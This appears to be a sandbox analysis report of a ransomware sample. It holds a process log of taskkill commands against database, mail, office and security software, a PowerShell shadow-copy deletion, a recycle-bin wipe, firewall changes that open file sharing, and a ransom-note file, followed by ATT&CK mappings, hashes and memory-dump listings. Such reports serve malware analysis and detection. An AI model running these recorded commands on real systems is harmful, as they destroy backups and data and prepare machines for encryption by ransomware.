C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:844

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1892

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1116

C:\Windows\SysWOW64\arp.exe
"arp" -a
2⤵
PID:1528

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
PID:1448

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1884

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:848

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
PID:548

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:764

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1744

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1196

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:996

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1448

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:1252

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ragent.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM rmngr.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:548

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM rphost.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM 1cv8.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqld.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1288

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sql.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysql.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM vmwp.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:756

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
PID:1152

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:1580

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:1740

C:\Windows\SysWOW64\arp.exe
"arp" -a
2⤵
PID:548

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\Инструкция.txt
2⤵
PID:1820

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1136

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Winlogon Helper DLL

1

T1004

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\Инструкция.txt
MD5
8e2cf49a0a98be947f57cc6c5fb27559

SHA1
e1b10d4f0d7be9f06c58d8bf5ffa47cb71e8a9ea

SHA256
5dd6ac434f6ceebb6799d485323b94f0d4a4cc68573799672c4089d1e507a944

SHA512
08785524e7c057cb0b15aaaa243fe6067a31b6fd2d2a2591cf5b519d68d8d20d6ca04e2e87303693254e5b850e52884a23f505f9dd4c39e1098d41592a2b0692

Download Submit
C:\Users\Admin\Documents\InstallDisable.xps.cyber
MD5
4aa9cfbd2cbf906465abface38253cd3

SHA1
a119cdfce0f71c46a108a4b99c90062bca049176

SHA256
9a8515664025c1744e5976d42f96d653b35c871ab3734c56e5a25a3aa83696a9

SHA512
e4c385c5cb4af7b345f1e815cfe80b22f4482b628621ff377fb33a7a85995ec05114f3b2f1fd7670fe657d5a42f590d6cf103f88d54e6cdd6db366d436b79d68

Download Submit
memory/284-67-0x0000000000000000-mapping.dmp

Download
memory/548-121-0x0000000000000000-mapping.dmp

Download
memory/548-99-0x0000000000000000-mapping.dmp

Download
memory/656-87-0x0000000000000000-mapping.dmp

Download
memory/756-124-0x0000000002550000-0x000000000319A000-memory.dmp

Filesize
12.3MB

Download
memory/756-125-0x0000000002550000-0x000000000319A000-memory.dmp

Filesize
12.3MB

Download
memory/756-123-0x0000000002550000-0x000000000319A000-memory.dmp

Filesize
12.3MB

Download
memory/764-106-0x0000000000000000-mapping.dmp

Download
memory/844-88-0x0000000000000000-mapping.dmp

Download
memory/848-98-0x0000000000000000-mapping.dmp

Download
memory/892-84-0x0000000000000000-mapping.dmp

Download
memory/920-108-0x0000000000000000-mapping.dmp

Download
memory/996-115-0x0000000000000000-mapping.dmp

Download
memory/996-64-0x0000000000000000-mapping.dmp

Download
memory/1040-57-0x0000000000000000-mapping.dmp

Download
memory/1100-120-0x0000000000000000-mapping.dmp

Download
memory/1100-76-0x0000000000000000-mapping.dmp

Download
memory/1116-91-0x0000000000000000-mapping.dmp

Download
memory/1136-100-0x0000000000000000-mapping.dmp

Download
memory/1136-130-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp

Filesize
8KB

Download
memory/1136-132-0x0000000004250000-0x0000000004251000-memory.dmp

Filesize
4KB

Download
memory/1152-86-0x0000000000000000-mapping.dmp

Download
memory/1176-103-0x0000000000000000-mapping.dmp

Download
memory/1196-109-0x0000000000000000-mapping.dmp

Download
memory/1240-73-0x0000000000000000-mapping.dmp

Download
memory/1252-118-0x0000000000000000-mapping.dmp

Download
memory/1260-60-0x0000000000000000-mapping.dmp

Download
memory/1368-81-0x0000000000000000-mapping.dmp

Download
memory/1396-78-0x0000000000000000-mapping.dmp

Download
memory/1444-58-0x0000000000000000-mapping.dmp

Download
memory/1448-95-0x0000000000000000-mapping.dmp

Download
memory/1448-116-0x0000000000000000-mapping.dmp

Download
memory/1456-65-0x0000000000000000-mapping.dmp

Download
memory/1508-80-0x0000000000000000-mapping.dmp

Download
memory/1520-56-0x0000000000000000-mapping.dmp

Download
memory/1528-111-0x0000000000000000-mapping.dmp

Download
memory/1528-93-0x0000000000000000-mapping.dmp

Download
memory/1536-62-0x0000000000000000-mapping.dmp

Download
memory/1556-117-0x0000000000000000-mapping.dmp

Download
memory/1580-104-0x0000000000000000-mapping.dmp

Download
memory/1584-119-0x0000000000000000-mapping.dmp

Download
memory/1596-97-0x0000000000000000-mapping.dmp

Download
memory/1600-61-0x0000000000000000-mapping.dmp

Download
memory/1604-94-0x0000000000000000-mapping.dmp

Download
memory/1608-72-0x00000000759B1000-0x00000000759B3000-memory.dmp

Filesize
8KB

Download
memory/1608-63-0x0000000000000000-mapping.dmp

Download
memory/1612-55-0x0000000000000000-mapping.dmp

Download
memory/1668-70-0x0000000000000000-mapping.dmp

Download
memory/1696-83-0x0000000000000000-mapping.dmp

Download
memory/1700-79-0x0000000000000000-mapping.dmp

Download
memory/1708-92-0x0000000000000000-mapping.dmp

Download
memory/1720-102-0x0000000000000000-mapping.dmp

Download
memory/1744-107-0x0000000000000000-mapping.dmp

Download
memory/1752-110-0x0000000000000000-mapping.dmp

Download
memory/1764-101-0x0000000000000000-mapping.dmp

Download
memory/1796-105-0x0000000000000000-mapping.dmp

Download
memory/1816-85-0x0000000000000000-mapping.dmp

Download
memory/1820-74-0x0000000000000000-mapping.dmp

Download
memory/1832-82-0x0000000000000000-mapping.dmp

Download
memory/1884-96-0x0000000000000000-mapping.dmp

Download
memory/1892-90-0x0000000000000000-mapping.dmp

Download
memory/1896-77-0x0000000000000000-mapping.dmp

Download
memory/1900-68-0x0000000000000000-mapping.dmp

Download
memory/1920-114-0x0000000000000000-mapping.dmp

Download
memory/1920-69-0x0000000000000000-mapping.dmp

Download
memory/1960-113-0x0000000000000000-mapping.dmp

Download
memory/1960-71-0x0000000000000000-mapping.dmp

Download
memory/1964-75-0x0000000000000000-mapping.dmp

Download
memory/2016-66-0x0000000000000000-mapping.dmp

Download
memory/2016-112-0x0000000000000000-mapping.dmp

Download
memory/2032-53-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/2032-59-0x0000000005290000-0x0000000005291000-memory.dmp

Filesize
4KB

Download
memory/2032-133-0x0000000005295000-0x00000000052A6000-memory.dmp

Filesize
68KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads